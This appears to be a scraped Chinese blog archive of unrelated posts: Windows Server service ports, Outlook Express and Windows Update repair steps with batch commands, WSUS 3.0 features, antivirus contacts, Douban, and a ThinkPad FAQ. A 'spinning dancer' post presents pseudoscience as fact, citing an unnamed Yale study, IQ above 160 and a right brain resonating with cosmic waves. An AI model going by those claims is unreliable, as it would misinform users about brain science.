Microsoft Systems Management Server (SMS) 2003 为 Microsoft 操作系统的更改和配置管理提供了一个全面的解决方案。使用此解决方案,组织可以快速经济地为用户提供相关的软件和更新程序。
应用程序协议 协议 端口
NetBIOS 数据报服务 UDP 138
NetBIOS 名称解析 UDP 137
NetBIOS 会话服务 TCP 139
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
TCP/IP 打印服务器
“TCP/IP 打印服务器”系统服务允许基于 TCP/IP 的打印(使用 Line Printer Daemon 协议)。服务器上的 LPD 服务从运行于 UNIX 计算机上的“远程行式打印机 (LPR)”实用工具接收文档。
系统服务名称:LPDSVC 应用程序协议 协议 端口
LPD TCP 515
Telnet
用于 Windows 的 Telnet 系统服务为 Telnet 客户端提供 ASCII 终端会话。Telnet 服务器支持两种类型的身份验证,并支持以下四种类型的终端:
美国国家标准协会 (ANSI)
VT-100
VT-52
VTNT
系统服务名称:TlntSvr 应用程序协议 协议 端口
Telnet TCP 23
终端服务
终端服务提供了一个多会话环境,允许客户端设备访问虚拟 Windows 桌面会话和服务器上运行的基于 Windows 的程序。终端服务允许多个用户以交互方式连接到一台计算机。
系统服务名称:TermService 应用程序协议 协议 端口
终端服务 TCP 3389
终端服务授权
“终端服务授权”系统服务安装许可证服务器,并在已注册的客户端连接到终端服务器(启用“终端服务器”的服务器)时为这些客户端提供许可证。终端服务授权是一种低影响服务,它存储已颁发给终端服务器的客户端许可证,然后跟踪已颁发给客户计算机或终端的许可证。
系统服务名称:TermServLicensing 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
终端服务会话目录
“终端服务会话目录”系统服务允许负载平衡终端服务器群集将用户的连接请求正确地路由到用户已在其上运行会话的服务器。不论用户是否正在服务器群集中运行另一个会话,用户都被路由到第一个可用的终端服务器。负载平衡功能使用 TCP/IP 网络协议集中多个服务器的处理资源。在终端服务器群集中,可以使用此服务在多个服务器之间分配会话,以提高单个终端服务器的性能。终端服务会话目录跟踪群集上断开连接的会话,并确保用户重新连接到那些会话。
系统服务名称:Tssdis 应用程序协议 协议 端口
RPC TCP 135
随机分配的高 TCP 端口 TCP 随机端口号
普通 FTP 后台程序
“普通 FTP 后台程序”系统服务是 RIS 不可缺少的一部分,不需要用户名和密码。“普通 FTP 后台程序”服务实现对由以下 RFC 定义的“普通 FTP 协议 (TFTP)”的支持:
RFC 1350 - TFTP
RFC 2347 - 选项扩展
RFC 2348 - 块大小选项
RFC 2349 - 超时间隔和传输大小选项
TFTP 是一种文件传输协议,旨在支持无盘引导环境。TFTP 后台驻留程序侦听 UDP 端口 69,但从随机分配的高端口进行响应。因此,启用此端口后,TFTP 服务可以接收传入的 TFTP 请求,但所选服务器并不能响应这些请求。必须将所选服务器配置为从端口 69 进行响应,它才能响应入站 TFTP 请求。
系统服务名称:tftpd 应用程序协议 协议 端口
TFTP UDP 69
通用即插即用设备主机
“通用即插即用主机发现”系统服务实现了设备注册、控制和响应宿主设备事件所需的全部组件。与设备相关的注册信息(说明、有效期和容器)可以选择存储在磁盘上,并在注册后或者在操作系统重新启动时在网络上公布。此服务除了包括服务说明和演示页外,还包括为设备提供服务的 Web 服务器。
系统服务名称:UPNPHost 应用程序协议 协议 端口
UPNP TCP 2869
Windows Internet 名称服务 (WINS)
Windows Internet 名称服务 (WINS) 启用 NetBIOS 名称解析。此服务使用 NetBIOS 名称帮助您定位网络资源。除非已将所有域都升级到 Active Directory 目录服务并且网络上的所有计算机都运行 Windows 2000 或更高版本,否则需要 WINS 服务器。WINS 服务器使用 NetBIOS 名称解析与网络客户端通信。仅在 WINS 服务器之间才需要 WINS 复制。
系统服务名称:WINS 应用程序协议 协议 端口
NetBIOS 名称解析 UDP 137
WINS 复制 TCP 42
WINS 复制 UDP 42
Windows 媒体服务
Windows Server 2003 中的 Windows 媒体服务取代了 Windows 媒体服务 4.0 版和 4.1 版中包含的以下四项服务:
Windows 媒体监视服务
Windows 媒体节目服务
Windows 媒体广播站服务
Windows 媒体单播服务
Windows 媒体服务现在是单个服务,运行于 Windows Server 2003 标准版、Windows Server 2003 企业版和 Windows Server 2003 数据中心版上。其核心组件是使用 COM 开发的,它具有灵活的结构,可以根据具体的节目自定义。它支持各种控制协议,包括实时流协议 (RTSP)、Microsoft Media Server (MMS) 协议和 HTTP。
系统服务名称:WMServer 应用程序协议 协议 端口
HTTP TCP 80
MMS TCP 1755
MMS UDP 1755
MS Theater UDP 2460
RTCP UDP 5005
RTP UDP 5004
RTSP TCP 554
Windows 时间
“Windows 时间”系统服务维护网络上所有基于 Windows XP 和 Windows Server 2003 的计算机上的日期和时间同步。此服务使用网络时间协议 (NTP) 使计算机时钟同步,以便为网络验证和资源访问请求分配准确的时钟值或时间戳。NTP 的实现和时间提供程序的集成帮助 Windows Time 成为您企业的可靠、灵活的时间服务。对于没有加入域的计算机,可以配置 Windows 时间以使时间与外部时间源同步。如果关闭此服务,则本地计算机的时间设置将不能与 Windows 域中的时间服务或外部配置的时间服务同步。Windows Server 2003 使用 NTP。NTP 运行于 UDP 端口 123 上。此服务的 Windows 2000 版本使用简单网络时间协议 (SNTP)。SNTP 也运行于 UDP 端口 123 上。
系统服务名称:W32Time 应用程序协议 协议 端口
NTP TCP 123
SNTP UDP 123
万维网发布服务
万维网发布服务提供了注册、管理、监视向 IIS 注册的 Web 站点和程序以及为它们提供服务所需的基础结构。此系统服务包含一个进程管理器和一个配置管理器。进程管理器控制自定义应用程序和 Web 站点驻留的进程。配置管理器读取已存储的万维网发布服务的系统配置,并确保 Http.sys 被配置为将 HTTP 请求路由到相应的应用程序池或操作系统进程。通过 Internet 信息服务 (IIS) 管理器管理单元,可以对此服务所使用的端口进行配置。如果启用了管理 Web 站点,则将创建一个在 TCP 端口 8098 上使用 HTTP 通信的虚拟 Web 站点。
系统服务名称:W3SVC 应用程序协议 协议 端口
HTTP TCP 80
HTTPS TCP 443 本文来自:http://www.xmitclub.com/dispbbs.asp?boardid=6&id=1113 此文源于解决Outlook Express错误引出: outlook express客户端的 0×800C0133错误的解决方案 当您采用Microsoft Outlook Express软件在接收邮件时报出如下错误提示:”出现未知错误。 帐户: ‘test’, 服务器: ‘pop.test.com’, 协议: POP3, 端口: 110, 安全(SSL): 否, 错误号: 0×800C0133″时的原因及解决方案:
由于Outlook Express存在着一个2G的问题,这个问题产生的原因就在于Outlook中单个文件夹超过2G或者接近2G的时候就会发生错误,主要表象在:
1)、Mail收了下来,但是自己看不到;而服务器上面也没了。
2)、只要是有附件的mail,都没法收,一收就报错。
3)、里面的文件夹打不开,或者是打开了却什么mail都看不到,但是在资源管理器中看.dbx文件(比如说是“收件箱.dbx”)却占了很大的空间。
4)、收到较大邮件,经过较长时间的等待,最后Outlook Express报错。在服务器上删除了较大的邮件后,小文件就可以收了,但遇到大文件后又不可以了当你使用OutLook Express时出现无法打开收件箱,无法查阅收件箱中内容等一系列问题(错误号:0×800C0133 )。经过查询,发现之所以会出现以上问题都是由于收件箱等 .dbx文件超出了OutLook Express规定的2G的空间上限,还有一种情况是当你发送邮件之后,邮件不能成功进入已发送邮件文件夹,经过查看发现在邮件的存储目录中出现大于或接近2G的单个邮件存储文件存在,由于Outlook Express邮件存储文件最大支持2G,因此判断问题出在这里了。解决方法:收件箱超过2G,备芬或者删除多余的邮件,或者rename 收件箱.dbx为old.dbx。或者新建一个收件夹,把一些信分批移动过去。 http://hi.baidu.com/oliverding/blog/item/df78289565f1d40b7af48069.html (注:有可能你机器上的不是{2D085F68-59BF-49A0-A3FA-46CE13630BD6},不过没关系,因为Identities下面就一个文件夹) OE默认把邮件都保存路径是在C:\Documents and Settings\你的用户名\Local Settings\Application Data\Identities\{2D085F68-59BF-49A0-A3FA-46CE13630BD6}\Microsoft\Outlook Express文件夹下,当然你也可以把OE的默认的保存路径改到如D:\Backup\Outlook Express下(方法:打开OE,工具-选项-维护-存储文件夹,点击更改,找到D:\Backup\Outlook Express确定即可)。 如果没有修改过默认的保存路径,我们一般在重装系统前将Outlook Express整个文件夹复制到别的盘,等系统装好之后,再将刚才备份出来的邮件文件夹直接拷回原来的位置即可完成邮件导入,以前的邮件全部都在。 可是有时因为我们的一些误操作,使我们面临进退两难的境地。比如说,刚装好系统后急不可待地去设置OE,结果一下子收来许多新邮件,这才想到旧邮件还没有导入,赶紧把网线拔掉,可已经来不急了,已经收到100多封新邮件了。这可怎么办啊?要导入备份的邮件吧,新收来的邮件就被覆盖掉,能把新收到的邮件“收件箱.dbx”单个文件导入到备份的邮件里面去么?答案是可以的。 1、把新收到的邮件存储文件夹剪切到其它地方,然后将以前邮件的备份剪切到邮件存储文件夹。
位置一般在C:\Documents and Settings\你的用户名\Local Settings\Application Data\Identities\{2D085F68-59BF-49A0-A3FA-46CE13630BD6}\Microsoft\Outlook Express 2、打开OE,这时可以看到以前所有的邮件都在里面了,现在要做的就是导入新收到邮件的“收件箱.dbx”。先随便建立一个文件夹,例如就叫做new好了。 3、随便复制一封邮件到新建的new文件夹(很重要)。这么做的目的是让OE产生new.dbx并生成新的索引。 4、关闭OE。 5、打开邮件的存储文件夹,删除new.dbx 6、把你要导入的那个“收件箱.dbx”文件,改名为“new.dbx”,然后剪切到OE的邮件存储文件夹里。 7、再次打开OE后你就可以看到new文件夹里面就是你要导入的邮件了。
这时,你可以把new里面所有的邮件转移到收件箱或你的个人邮件夹里,也可以直接把它改成你想要的邮件夹的名字。 原理:偷梁换柱
看起来好像有点复杂,其实原理很简单,就是「调包」而已。
因为我们要插入一个.dbx文件到OE邮件夹里,但是OE索引中没有此笔数据,因此光是把这个.dbx文件复制过去OE是找不到的,所以上面第二、第三步的目的就是让OE产生一个.dbx文件,也连带生成新的索引。
接下来要做的就是拿我们要还原的那个.dbx文件去替换掉刚刚故意建立的那个.dbx 文件就完成了。 这种方法非常适合把公司电脑里的邮件导入到家里的电脑的OE里,我们要做的就是新建一个邮件夹,然后把要的邮件拷贝到里面,然后将该.dbx文件带回家就行了。 注:在查另外一个问题,看到此文,方法简单可行,之前我的作法是利用DBX2EML这个工具把dbx文件导出成eml文件然后直接拖拽到收件箱就可以了。 从管理控制台管理 WSUS
WSUS 3.0 管理控制台已从基于 Web 的控制台变为 Microsoft 管理控制台 3.0 版的一个插件。新的用户界面提供以下功能:
• 每个节点的主页都包含与节点相关联的任务的概述
• 高级过滤
• 新列允许根据 MSRC 编号、MSRC 严重性、KB 文章和安装状态对更新进行分类
• 对列进行选择、排序和重新排序
• 快捷菜单允许右键单击并选择一个操作
• 与更新视图集成的报告
• 自定义视图
远程管理 WSUS
可以将 WSUS 3.0 管理控制台安装在网络中的其他计算机上,以便远程管理 WSUS 3.0 服务器。
使用向导配置安装后的任务
配置向导指导新用户进行安装后的服务器配置过程。
生成准确性更高的多个报告
现在可以直接从更新视图生成报告。可以报告更新的子集,如计算机需要但还未批准安装的安全更新。可以在副本层次结构管理的所有计算机上创建报告,还可以将这些报告以 Excel 或 PDF 格式保存。
更容易地维护服务器运行状况
WSUS 3.0 现在将详细的服务器运行状况信息记录在事件日志中。现在可用一个 Microsoft Operations Manager (MOM) 包来监视 WSUS 服务器生成的事件。
获得有关新更新的电子邮件消息
服务器对新更新和更新符合性摘要的电子邮件通知具有内置支持。
可轻松删除旧信息
可使用清除向导从服务器中删除旧的计算机、旧的更新和旧的更新文件。
从 WSUS 2.0 无缝升级到 WSUS 3.0
WSUS 3.0 可以安装在已安装 WSUS 2.0 的服务器上。安装过程将执行可保留所有先前设置和批准的原位升级。升级服务器层次结构时应从中心服务器开始,然后向下延续至各个层次结构。WSUS 2.0 服务器可从 WSUS 3.0 服务器同步,但是 WSUS 3.0 服务器不能从 WSUS 2.0 服务器同步。从 WSUS 2.0 升级到 WSUS 3.0 是一个单向过程,返回到 WSUS 2.0 要求首先删除 WSUS 3.0,然后安装 WSUS 2.0。
更快获得更新
使用 WSUS 3.0,可以将服务器配置为最快每隔一小时自动同步更新一次(而 WSUS 2.0 则是每天一次)。此改进使新的更新可在整个公司内更快地复制。
设置更多自动审批
WSUS 3.0 自动审批规则允许指定不同的产品和更新分类,如自动审批 Microsoft Word 的定义更新。此外,WSUS 3.0 还支持创建多个自动审批规则,而不是单个规则。自动审批规则现在将应用于 WSUS 服务器上当前所有的更新。
限制对只读报告的访问权限
“WSUS Reporters”安全组的成员将只具有服务器的只读访问权限。成员可生成报告,但是不能批准更新或配置服务器。
从单个控制台管理多个服务器
WSUS 3.0 管理控制台允许检查和管理层次结构中的所有 WSUS 服务器。
为所有计算机创建报告
现在可以为副本层次结构管理的所有计算机创建更新报告。
在群集中配置服务器
现在可在群集中配置 WSUS 3.0 服务器来实现容错。此类服务器必须全部指向同一 SQL 服务器数据库实例,该实例也可使用群集技术。
切换副本模式
现在可在副本模式和自主模式之间移动子服务器,而无需重新安装 WSUS 3.0。
将客户端分配给多个目标组
在 WSUS 3.0 中,一台计算机可属于多个目标组(例如,“桌面”组和“测试”组)。此外,还可以创建层次结构组(例如,具有“关键服务器”和“非关键服务器”子组的“服务器”目标组)。可以指定批准父目标组,这些批准将自动被子组中的计算机继承。
采用更快的性能
WSUS 3.0 可获得比 WSUS 2.0 高大约 50% 的可伸缩性。此外,WSUS 3.0 附带本机 x64 支持以进一步改善 64 位硬件的性能和可伸缩性。
在分支机构中指定语言
为了节省磁盘空间和网络负载,现在可将分支机构配置为下载较少语种(与中心服务器相比)的更新。例如,可以配置中心服务器下载所有语言的更新,而分支机构只下载英语更新。
配置单独的内容和元数据通道
以前分支机构使用窄带连接中心服务器,但使用宽带连接 Internet,现在可配置为从中心服务器获取元数据,而从 Microsoft Update 获取更新内容。
上移到 .NET Framework 2.0 支持
新的 API 以 .NET Framework 2.0 为基础。
用于高级管理工具的 API 优于 WSUS 控制台
已创建的新 API 供高级管理工具(如 System Center Essentials)使用,而 WSUS 管理控制台中没有提供这些功能。
将可选安装批准添加到管理员选项
新的 API 支持为“可选安装”创建批准,它使 Windows Update Agent 在“添加或删除程序”对话框中显示可供使用的安装更新,而不是通过“自动更新”来执行更新。
收集硬件和软件清单
新的 API 支持从管理的设备收集硬件和软件清单。 WSUS控制台总会报一些更新失败的计算机,有时可能会有几台到十几台不等,其中一方面原因是客户端出现更新提示后没有点击安装,每天都有黄色叹号提示出来但他每天都不点(在公司这样的人相当多),还有个原因是C盘空间如果太小控制台也会把这台机列如失败数量范围,还有一些其它方面的问题,如安装其它软件有时冲突或是重毒和安装一些插件不能完全卸载以及系统盘权限等都会引起.一般可通过下面的批处理文件修正这些错误. 将下面文件复制放入记事本后将后缀".txt"改为".bat"批处理就做成了. net stop wuauserv rename %systemroot%\SoftwareDistribution SDOLD net start wuauserv regsvr32 /s urlmon.dll regsvr32 /s Shdocvw.dll regsvr32 /s Msjava.dll regsvr32 /s Actxprxy.dll regsvr32 /s Oleaut32.dll regsvr32 /s Mshtml.dll regsvr32 /s Browseui.dll regsvr32 /s Shell32.dll regsvr32 /s jscript.dll regsvr32 /s msxml.dll regsvr32 /s msxml2.dll regsvr32 /s msxml3.dll regsvr32 /s wuapi.dll regsvr32 /s wuaueng.dll regsvr32 /s wuaueng1.dll regsvr32 /s wuauserv.dll regsvr32 /s wucltui.dll regsvr32 /s wups.dll regsvr32 /s wuweb.dll regsvr32 /s iuengine.dll regsvr32 /s softpub.dll regsvr32 /s initpki.dll regsvr32 /s mssip32.dll attrib -h -s -r %windir%\system32\catroot2 attrib -h -s -r %windir%\system32\catroot2\*.* net stop cryptsvc rename %systemroot%\system32\catroot2 oldcatroot2 net start cryptsvc 公安部公共信息网络安全监察局自2000年以来,历年组织开展了全国信息网络安全状况和计算机病毒疫情调查活动,今年是第八个年头。迄今为止,计算机病毒疫情调查已经组织了7次,网络安全状况调查组织了4次。国家计算机病毒应急处理中心、国家反计算机入侵和防病毒研究中心、各省(自治区/直辖市)公安厅(局}公共信息网络安全监察处、各地信息网络安全协会具体承办和负责组织工作。2007年的调查活动已经启动。 以下为调查活动病毒防治产品生产厂商的技术支持电话表和免费在线杀毒链接: 厂家技术支持电话 公司名称 提供的技术支持电话 趋势 800-820-8876 卡巴斯基 022-66211266 赛门铁克 010-85183338 冠群金辰 800-810-0412 瑞星 010-82678800 飞塔 010-58797887
安博士
800-810-0607
熊猫
010-82531188
金山
010-82331816
江民
800-810-2300
厂家提供在线杀毒的链接
公司名称
提供的服务链接
趋势
提供在线查杀1个月(中文):http://housecall65.trendmicro.com/
卡巴斯基
提供在线查杀1个月:
http://www.kaspersky.com.cn/webscanner/index.html
赛门铁克
提供在线查杀1个月:
http://security.symantec.com/sscv6/default.asp?productid=symhome&langid=ie&venid=sym
冠群金辰
提供在线杀毒时间不限
http://www.kill.com.cn/product/webscan/718.asp
瑞星
提供在线查毒1个月:
http://online.rising.com.cn/free/index.htm
飞塔
提供在线查毒1个月: http://www.fortiguardcenter.com/antivirus/virus_scanner.html
安博士
提供在线杀毒1个月
http://www.ahn.com.cn/aspservice/myv3.jsp
熊猫
提供在线杀毒
http://www.nanoscan.com/as/v1/principal.aspx
金山
提供在线杀毒1个月
http://sso.shop.kingsoft.com/scan.php?fpage=60233edfacc57953e2bc5cfec9e522ac
江民
提供在线杀毒为期1个月 http://online.jiangmin.com www.douban.com 豆瓣是几年前发现的,今天因再次看了[绿里奇迹]才想到它,因此觉得有必要推荐给朋友们。
当然,不仅仅是它这篇非常实际的站名简介
关于豆瓣
豆瓣的来历
你经常对着书店里的绵绵不绝的封面发呆吗?或者头晕脑涨地从音像店的琳琅满目中逃出?宽带下载和网上购物降临之后,即使在最小的城镇,你的选择也在每天成百上千地增加。这其中一定有你会喜爱的东西,但十有八九它们会在不知不觉中和你擦肩而过。媒体让老少咸宜的大片无处不在,对 只适合一群人的东西却显得力不从心。而且,萝卜青菜,各有所爱,不管电视的娱乐编辑和报纸的书评作家多么公正和勤勉,他们的帮助都不可能对所有人同样有效。
豆瓣的发起者发现,对多数人做选择最有效的帮助其实来自亲友和同事。随意的一两句推荐,不但传递了他们自己真实的感受,也包含了对你口味的判断和随之而行的筛选。他们不会向单身汉推荐育儿大全,也不会给老妈带回赤裸特工。遗憾的是,你我所有的亲友加起来,听过看过的仍然有限。而且,口味最类似的人却往往是陌路。
如果能不一一结交,却知道成千上万人的口味,能从中间迅速找到最臭味相投的,口口相传的魔力一定能放大百倍, 对其中每一个人都多少会有帮助。豆瓣随着这一个愿望产生。豆瓣不针对任何特定的人群,力图包纳百味。无论高矮胖瘦,白雪巴人,豆瓣帮助你通过你喜爱的东西找到志同道合者,然后通过他们找到更多的好东西。 因过分清理,把XP的搜索助理给清除了,导致按Ctrl+F或F3都无法文件搜索。 在执行“搜索”功能后,系统弹出错误对话框,提示“无法找到运行搜索助理需要的一个文件。您可能需要运行安装。”
方法一:打开文件夹“C:\Windows\inf”,找到“srchasst.inf”文件,用单击鼠标右键,在弹出的菜单中选择“安装”。
方法二:运行注册表,定位于“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState”,新建字符串“Use Search Asst”,设置其值为“no”(no必须是小写,否则不起作用)。 在使用第一种方法时,可能会用到XP的安装盘 方法二做成CMD或BAT文件如下。 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState" /v "Use Search Asst" /t REG_SZ /d no pause 如果你看见这个舞女是顺时针转,说明你用的是右脑;
如果是逆时针转,说明你用的左脑。
耶鲁大学耗时5年的研究成果,据说。
14%的美国人可以两个方向都能看见
顺时针转的话 , 属於是用右脑较多的类型
逆时针转属於使用左脑较多的类型
大部分人的眼里里是逆时针方向转动 , 但也有人看来是顺时针方向转动的 .
顺时针的情况 , 女性比男性多 ~
逆时针转动的 , 突然变成顺时针的话 , IQ是 160以上 !!!
科学人杂志--天才的特殊思维
顶叶负责掌管脑中的数学和逻辑 ,这也是爱因斯坦成为天才的秘密。但不可否认的 ,爱因斯坦丰富的想像力与创造力 ,是使他的右脑不断激发出潜在能力的重要因素之一。
左脑因为是以语言处理讯息 ,控制知识、判断力、思考力因此被称为「知性脑」;右脑则控制著自律神经与字宙波动共振 ,由于是图像脑 ,因此造型能力优越 ,被称为「艺术脑」。
有关右脑的神奇功能研究 ,是始于 1 9 8 1年加州理工学院罗杰· 史贝利 博士研究右脑获得诺贝尔奖以后 ,人们才开始对右脑有所认识 ,在此之前 ,人们并不认为左脑与右脑的功能有那么大的差别。史贝利在分割脑的实验中发现 ,左脑与右脑这两个半球完全以不同的方式在进行思考 ,他发现左脑用语言进行思考 ,右脑则是以图像进行思考;左脑偏向语言、逻辑性的思考 ,右脑则是影像和心像的思考。
根据七 田真 博士的研究 ,原来人在诞生之初 ,右脑的能力还很发达 ,右脑具备了超越常识那种几乎可称为全然未知的天才似的能力 ,这种能力自古以来就隐藏在人们脑海里 ,是一种超越时间、空间 ,与无限境界相连结的能力 ,但是因为人类世界是以教导、开启左脑为主 ,让小孩子努力学习语言以及往后生存所必需的知识 ,久而久之 ,左脑越来越发达 ,右脑却因为少用而日形退化。至于什么样的成人比较容易打开右脑 ,七 田真 博士认为 ,心思专注、纯真没有成见的人 ,比较容易进入神奇的右脑世界。
你相信超能力吗?如果你有看过 (雨人 )这部电影 ,一定对片中达斯汀霍夫曼饰演的哥哥印象深刻 ,他不但能正确快速数出散落一地的火柴数目 ,而且饰演他弟弟的汤姆克鲁斯还利用他天赋异禀的「透视」能力 ,上赌场找人玩扑克牌 ,结果对手的牌在达斯汀霍夫曼的「全神贯注」下 ,被透视得一 览无疑 ,汤姆克鲁斯因此赢了一大笔钱。
或许你会认为那是电影夸张其事 ,现实世界中 ,人不可能具备那样的能力。如果你这么想 ,你就是犯了习惯左脑思考的错误 ,其实 ,人类大脑的另一半 -右脑 ,拥有的能力是左脑思考者很难想像的。
当我尽量不看人像,而是把目光对准地面上脚的阴影的时候,可以在脑子里"想",要它顺时针转,她就顺时针,要她逆时针,她就逆时针,仿佛你的思维可以控制图片的转动一样。而如果精神高度集中,就可以让人像左右摆动,根本绕不出一个完 整的圈子。我一直在努力尝试,看能不能把人像给定住,让她静止不动。这个游戏最好玩的地方在于,你只能自己玩,然后你和别人说你的感受,他们一开始会绝对不相信。但是,你又没有办法把你看到的景象用任何方式记录下来,给别人做个证明,因为那只存在于你的脑子里。但是,一旦别人也适应了,能看到这一点的时候,他们会无条件地赞同你,仿佛你们分享了天地间的一大秘密。
唯心主义者应该非常喜欢这个例子,境由心造。不过在我看来,它最适合一个人面 对电脑屏幕玩。一开始的时候,我只能看见逆时针方向。等我偶然看见顺时针方向以后,就一直是顺时针旋转。而等我把人像遮住,只看脚的阴影,并试图用思维"改变"它的旋转方向并且取得成功以后,竟然这么看玩了半个小时。一个人,一张图,中间除了光线没有任何介质,但是你就是可以控制它的转动,非常人的小游戏。 1. IBM ThinkPad的全球研发中心在哪个国家?日本 Yamato实验室。
2. IBM的第一台ThinkPad 700C是那一年面世的? 1992年10月5日。
3. 被美国现代博物馆永久收藏的ThinkPad是哪个型号?ThinkPad 701C。
4. 历史上ThinkPad销售量最大的型号是什么? ThinkPad 600系列,共计售出两百万台。
5. IBM第一千万台和第两千万台ThinkPad分别是什么时间下线的? 2000年3月31日、2003年11月5日。
6. 2003年3月18日,IBM ThinkPad有两款什么型号的机器被中国登山队带上了世界最高峰珠穆朗玛峰? R40 和T40。 7. 2003年10月,中国人杨利伟登上了太空,而ThinkPad是哪一年登上太空的?是什么型号? 1993年 ThinkPad 750C。
8. IBM的笔记本为什么叫ThinkPad? ThinkPad翻译成中文是“会思考的本子”,这个名字是这样来的,在为IBM ThinkPad笔记本电脑命名的一个会议上,讨论了很久,大家都想不出什么特别的名字,这时一个晚到的同事随手把自己的便笺本扔到了大大的会议桌上,便笺本划了一个漂亮的弧线,封面上印的一个单词--Think映入了所有人的眼帘,于是ThinkPad这个名字诞生了。
9. ThinkPad的产品编号“X、T、R”含义分别是什么? X-Extreme portability 超轻、便携,面对很少在办公室的超级移动客户。 T-Thin and light for Travel 性能与便携性的完美结合,面对在办公室或随地办公室的高级移动客户。R-Reliable,Affordable Mobility 经济易用,面对需要便携、易用以及合适价格的客户。
10. 什么是内部模块化设计? ThinkPad减少了包括螺丝在内的许多不必要的零件,所有的电路卡直接入主机板的镀金插槽而不需要使用电线,使拆装维修更为简单。
11. 什么是IBM ThinkPad笔记本的防水键盘?您肯定很清楚,电子元件的最大敌人是水、潮湿,IBM设计了一种全新的键盘结构,使您碰到将少量液体溅落键盘时,可保证液体不会从中间和边缘流入机器主板上,最大程度的保证您的机器的安全。
12. 什么是TrackPoint?指位于键盘中央的鼠标控制系统-触摸杆,IBM ThinkPad 笔记本的象征,现在的TrackPo int 除了支持移动光标的功能外,向下按压还能实现普通鼠标左键的单击或双击功能,可谓" 无键鼠标"。
13. 什么是ThinkLight?这个是IBM的独特设计,让用户在光线不足的环境中可以继续使用ThinkPad,并且不会影响他人。它可通过使用快捷键Fn+PgUp键开启及关闭,实际情况使用时很管用的。
14. IBM 所有的笔记本电脑都具备ThinkLight键盘灯吗? IBM的笔记本除了R40e没有键盘灯以外,其他的系列X31 X40 T41 T42 R50 R51 R50e都有键盘灯设计
15. IBM ThinkPad拥有稳定性能的主要原因有?杰出设计的机器内部结构;良好的散热系统;品质卓越的机器材质;严格的品质测试。
16. ThinkPad良好的散热技术的具体表现为哪几个方面?快速导热管;键盘空气对流散热;智能型温控 CPU 风扇;金属导体散热;端口对外辐射散热。
17. ThinkPad在设计时使用最少的螺丝种类及数量目的是什么?使用更少的螺丝设计,增加机器的稳定性;更少零件,更少螺丝,即更简洁;更利于制造;更利于维修。
18. IBM现在生产的笔记本电脑是否还有串行(com)接口?为什么?没有,串口属于工业控制接口,现在的个人电脑主要用于家用和商用。IBM提供端口复制器和扩展坞来解决这些特殊的工业控制需求。
19. 为什么IBM ThinkPad笔记本使用两个屏幕锁扣?因为当用户无意中将笔记本电脑坠落到地面时,如果笔记本电脑上盖和下盖摔开的话,液晶非常容易碎裂。而IBM设计了两个屏幕锁扣,最大程度的保护了IBM ThinkPad笔记本电脑的液晶屏幕。
20. 为什么我的IBM ThinkPad笔记本电脑的风扇有时转有时不转呢?因为IBM ThinkPad笔记本电脑采用的是业界领先的温控风扇设计,当CPU的温度达到一定数值时才会通电工作,这样即实现了良好散热的功效,又很好的解决了电池供电时耗电过多,使用时间缩短的问题。
21. IBM的单键开启是什么意思? IBM经过调查,用户普遍反映在开启笔记本的屏盖时,经常碰到双手不同时空闲的情况,所以IBM在新款T41机器上设计了单键可开启的装置,但是它仍然采用了一贯的两个卡扣闭合的设计,使IBM ThinkPad笔记本在带给用户简单的使用方法时,同时仍具备可靠的安全性。
22. IBM的独特边框设计是什么意思?您肯定很清楚一台笔记本电脑最贵的部分是它的液晶,它占有整台机器30%~60%的成本,但同时它也是最脆弱的一个部分,非常容易破碎,所以IBM设计了独特的带有边框的液晶设计,它使得当笔记本受到压力或撞击时可以使压力转变到边框传至底部,而不会使液晶承担大的压力导致破碎。合上笔记本电脑时,边框与底座紧密结合,即使不小心摔落,也不会使其分开而造成液晶的损坏。
23. 谈谈现在ThinkPad各个系统产品的机壳材料是什么? R系列是高密碳素纤维材料;X、T使用钛复合材料和镁合金复合材料。
24. 谈谈传奇的IBM ThinkPad键盘的优点? 1)全尺寸键盘;2)七排键布局;3)快捷键和帮助键的设置;4 )键距18.5mm-19mm;5)键深1.8mm-2.5mm;6)人体工程学设计的掌托;7)键盘防水设计;8)键盘印字多年使用不退色;9)独有键盘照明灯ThinkLight;10)方便使用的UltraNav双定点设备;11)键盘客户自定义软件Keyboard Customizer Utility支持多种个性设置。
25. ThinkPad的BIOS提供哪几种密码保护?分别是什么? ThinkPad的BIOS提供开机密码(Power-on Password)、硬盘密码(Hard-disk Password)、超级密码(Supervision Password)以供用户使用。
26. IBM ThinkPad 笔记本电脑可调节液晶屏幕亮度的意义?可以提高舒适性让使用者的眼睛不易疲劳(依据环境光线调节屏幕亮度)。可以适当延长液晶使用寿命,长时间的高亮度使用会缩短液晶屏使用寿命。可以适当延长笔记本电脑电池使用时间(液晶是笔记本电脑中比较费电的设备)。
27. 如何给ThinkPad笔记本电脑上加Windows快捷键?通过Access IBM 程序组中的Keyboard Customizer Utility软件来设定一个键,如左边的“ALT”键为windows快捷键。
28. ThinkPad R50/R51、T41/T42分别使用的是什么标准的光驱? R50/R51-Ultrabay Enhanced;T41/T42-Ultrabay slim。
29. 什么是UltraNav双指点系统?为什么要在IBM ThinkPad笔记本电脑上使用UltraNav双指点系统? UltraNav双指点系统指的是IBM ThinkPad笔记本电脑键盘上的TrackPoint触摸杆和TouchPad触摸板。因为笔记本电脑自诞生以来,最流行的鼠标控制系统就是触摸杆和触摸板两种。那么IBM ThinkPad将这两种结构集于一身,最大程度的考虑到了用户的使用习惯,降低了用户的初次使用门槛,体现了IBM ThinkPad的易用性。
30. 笔记本电脑液晶屏幕的亮点问题是怎么回事?大家都知道,笔记本电脑的液晶是由数十万个非常细小的发光体组成,在工业批量生产时,很可能出现个别损坏的情况,导致该发光体不发光(暗点)或不变色(蓝点、红点等),这就是我们平常看到的亮点。各个厂家对上述情况均有具体规定,多大尺寸的液晶出现几个亮点属于合理范围。
31. IBM ThinkPad笔记本电脑有几种TrackPoint小红帽设计?现在有三种,分别为经典帽、软边帽、气泡帽。它们是针对不同用户的使用习惯而分别设计的。
32. 听说IBM ThinkPad笔记本电脑上有放大镜功能,是吗?是的,该功能主要是为做屏幕演示时放大局部而设计的。它可以通过快捷键Fn+空格键来激活。
33. IBM ThinkPad 笔记本为什么只有黑色没有其它颜色?不好意思,这个确实是IBM这个品牌的一个特点,这是IBM公司对自身品牌的一个定位,以及经过多年对用户的访查回馈的结果,黑色是代表庄重永久的意思,黑色也是永不过时的流行色吗!
